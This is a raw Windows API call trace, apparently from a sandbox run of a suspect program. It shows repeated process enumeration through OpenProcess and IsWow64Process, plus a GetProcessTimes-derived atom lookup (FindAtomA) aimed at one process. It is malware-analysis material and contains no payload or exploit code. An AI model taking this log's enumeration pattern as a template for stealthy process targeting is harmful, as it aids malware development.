	[0079.322] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x224
	[0079.322] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.322] CloseHandle (hObject=0x224) returned 1
	[0079.322] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x224
	[0079.322] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.322] CloseHandle (hObject=0x224) returned 1
	[0079.322] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x224
	[0079.322] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.322] CloseHandle (hObject=0x224) returned 1
	[0079.322] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xddc) returned 0x0
	[0079.323] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x224
	[0079.323] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.323] CloseHandle (hObject=0x224) returned 1
	[0079.323] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x224
	[0079.323] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.323] CloseHandle (hObject=0x224) returned 1
	[0079.323] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x224
	[0079.323] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.323] CloseHandle (hObject=0x224) returned 1
	[0079.323] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x224
	[0079.323] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.323] CloseHandle (hObject=0x224) returned 1
	[0079.323] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x224
	[0079.323] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.323] CloseHandle (hObject=0x224) returned 1
	[0079.323] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x224
	[0079.323] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.323] CloseHandle (hObject=0x224) returned 1
	[0079.323] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x224
	[0079.324] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.324] CloseHandle (hObject=0x224) returned 1
	[0079.324] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x224
	[0079.324] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.324] CloseHandle (hObject=0x224) returned 1
	[0079.324] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x224
	[0079.324] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.324] CloseHandle (hObject=0x224) returned 1
	[0079.324] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x224
	[0079.324] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.324] CloseHandle (hObject=0x224) returned 1
	[0079.324] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x224
	[0079.324] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.324] CloseHandle (hObject=0x224) returned 1
	[0079.324] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x224
	[0079.324] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.324] CloseHandle (hObject=0x224) returned 1
	[0079.324] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x224
	[0079.324] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.324] CloseHandle (hObject=0x224) returned 1
	[0079.325] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x224
	[0079.325] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.325] CloseHandle (hObject=0x224) returned 1
	[0079.325] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x224
	[0079.325] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.325] CloseHandle (hObject=0x224) returned 1
	[0079.325] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x224
	[0079.325] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.325] CloseHandle (hObject=0x224) returned 1
	[0079.325] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x224
	[0079.325] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.325] CloseHandle (hObject=0x224) returned 1
	[0079.325] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x224
	[0079.325] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.325] CloseHandle (hObject=0x224) returned 1
	[0079.325] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x224
	[0079.325] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.325] CloseHandle (hObject=0x224) returned 1
	[0079.325] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0079.325] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.325] CloseHandle (hObject=0x224) returned 1
	[0079.326] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0079.326] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0079.326] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0079.326] GetProcessTimes (in: hProcess=0x224, lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4 | out: lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4) returned 1
	[0079.326] wsprintfA (in: param_1=0x710e08, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0079.326] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0079.326] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0079.326] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0079.327] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0079.327] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc000
	[0079.327] CloseHandle (hObject=0x224) returned 1
	[0079.327] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0079.327] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0079.327] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdb8) returned 0x224
	[0079.327] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.327] CloseHandle (hObject=0x224) returned 1
	[0079.412] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0079.412] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0079.412] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0079.412] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0079.412] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0079.412] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0079.412] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0079.412] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0079.412] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0079.412] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0079.413] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0079.413] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0079.413] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0079.413] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0079.413] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0079.413] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0079.413] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0079.413] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0079.413] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x224
	[0079.413] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.413] CloseHandle (hObject=0x224) returned 1
	[0079.413] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0079.414] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0079.414] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x224
	[0079.414] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.414] CloseHandle (hObject=0x224) returned 1
	[0079.414] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0079.414] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x224
	[0079.414] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.414] CloseHandle (hObject=0x224) returned 1
	[0079.414] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x224
	[0079.414] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.414] CloseHandle (hObject=0x224) returned 1
	[0079.414] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x224
	[0079.414] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.414] CloseHandle (hObject=0x224) returned 1
	[0079.414] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x224
	[0079.414] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.414] CloseHandle (hObject=0x224) returned 1
	[0079.414] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x224
	[0079.414] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.415] CloseHandle (hObject=0x224) returned 1
	[0079.415] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x224
	[0079.415] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.415] CloseHandle (hObject=0x224) returned 1
	[0079.415] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0079.415] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x224
	[0079.415] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.415] CloseHandle (hObject=0x224) returned 1
	[0079.415] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x224
	[0079.415] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.415] CloseHandle (hObject=0x224) returned 1
	[0079.415] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x224
	[0079.415] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.415] CloseHandle (hObject=0x224) returned 1
	[0079.415] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xddc) returned 0x0
	[0079.415] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x224
	[0079.415] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.415] CloseHandle (hObject=0x224) returned 1
	[0079.416] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x224
	[0079.416] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.416] CloseHandle (hObject=0x224) returned 1
	[0079.416] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x224
	[0079.416] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.416] CloseHandle (hObject=0x224) returned 1
	[0079.416] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x224
	[0079.416] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.416] CloseHandle (hObject=0x224) returned 1
	[0079.416] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x224
	[0079.416] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.416] CloseHandle (hObject=0x224) returned 1
	[0079.416] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x224
	[0079.416] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.416] CloseHandle (hObject=0x224) returned 1
	[0079.416] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x224
	[0079.416] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.416] CloseHandle (hObject=0x224) returned 1
	[0079.416] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x224
	[0079.416] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.417] CloseHandle (hObject=0x224) returned 1
	[0079.417] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x224
	[0079.417] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.417] CloseHandle (hObject=0x224) returned 1
	[0079.417] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x224
	[0079.417] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.417] CloseHandle (hObject=0x224) returned 1
	[0079.417] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x224
	[0079.417] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.417] CloseHandle (hObject=0x224) returned 1
	[0079.417] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x224
	[0079.417] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.417] CloseHandle (hObject=0x224) returned 1
	[0079.417] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x224
	[0079.417] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.417] CloseHandle (hObject=0x224) returned 1
	[0079.417] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x224
	[0079.417] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.417] CloseHandle (hObject=0x224) returned 1
	[0079.417] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x224
	[0079.418] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.418] CloseHandle (hObject=0x224) returned 1
	[0079.418] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x224
	[0079.418] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.418] CloseHandle (hObject=0x224) returned 1
	[0079.418] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x224
	[0079.418] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.418] CloseHandle (hObject=0x224) returned 1
	[0079.418] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x224
	[0079.418] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.418] CloseHandle (hObject=0x224) returned 1
	[0079.418] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x224
	[0079.418] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.418] CloseHandle (hObject=0x224) returned 1
	[0079.418] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0079.418] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.418] CloseHandle (hObject=0x224) returned 1
	[0079.418] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0079.419] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0079.419] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0079.419] GetProcessTimes (in: hProcess=0x224, lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4 | out: lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4) returned 1
	[0079.419] wsprintfA (in: param_1=0x710e08, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0079.419] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0079.419] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0079.419] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0079.419] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0079.419] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc000
	[0079.419] CloseHandle (hObject=0x224) returned 1
	[0079.420] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0079.420] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0079.420] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdb8) returned 0x224
	[0079.420] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.420] CloseHandle (hObject=0x224) returned 1
	[0079.494] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0079.494] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0079.495] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0079.495] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0079.495] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0079.495] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0079.495] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0079.495] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0079.495] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0079.495] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0079.495] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0079.495] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0079.495] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0079.495] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0079.496] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0079.496] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0079.496] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0079.496] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0079.496] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x224
	[0079.496] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.496] CloseHandle (hObject=0x224) returned 1
	[0079.496] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0079.496] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0079.496] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x224
	[0079.496] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.496] CloseHandle (hObject=0x224) returned 1
	[0079.496] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0079.497] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x224
	[0079.497] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.497] CloseHandle (hObject=0x224) returned 1
	[0079.497] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x224
	[0079.497] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.497] CloseHandle (hObject=0x224) returned 1
	[0079.497] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x224
	[0079.497] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.497] CloseHandle (hObject=0x224) returned 1
	[0079.497] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x224
	[0079.497] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.497] CloseHandle (hObject=0x224) returned 1
	[0079.497] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x224
	[0079.497] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.497] CloseHandle (hObject=0x224) returned 1
	[0079.497] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x224
	[0079.497] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.497] CloseHandle (hObject=0x224) returned 1
	[0079.497] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0079.498] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x224
	[0079.498] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.498] CloseHandle (hObject=0x224) returned 1
	[0079.498] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x224
	[0079.498] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.498] CloseHandle (hObject=0x224) returned 1
	[0079.498] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x224
	[0079.498] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.498] CloseHandle (hObject=0x224) returned 1
	[0079.498] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xddc) returned 0x0
	[0079.498] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x224
	[0079.498] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.498] CloseHandle (hObject=0x224) returned 1
	[0079.498] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x224
	[0079.498] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.498] CloseHandle (hObject=0x224) returned 1
	[0079.498] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x224
	[0079.498] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.498] CloseHandle (hObject=0x224) returned 1
	[0079.498] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x224
	[0079.499] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.499] CloseHandle (hObject=0x224) returned 1
	[0079.499] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x224
	[0079.499] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.499] CloseHandle (hObject=0x224) returned 1
	[0079.499] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x224
	[0079.499] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.499] CloseHandle (hObject=0x224) returned 1
	[0079.499] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x224
	[0079.499] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.499] CloseHandle (hObject=0x224) returned 1
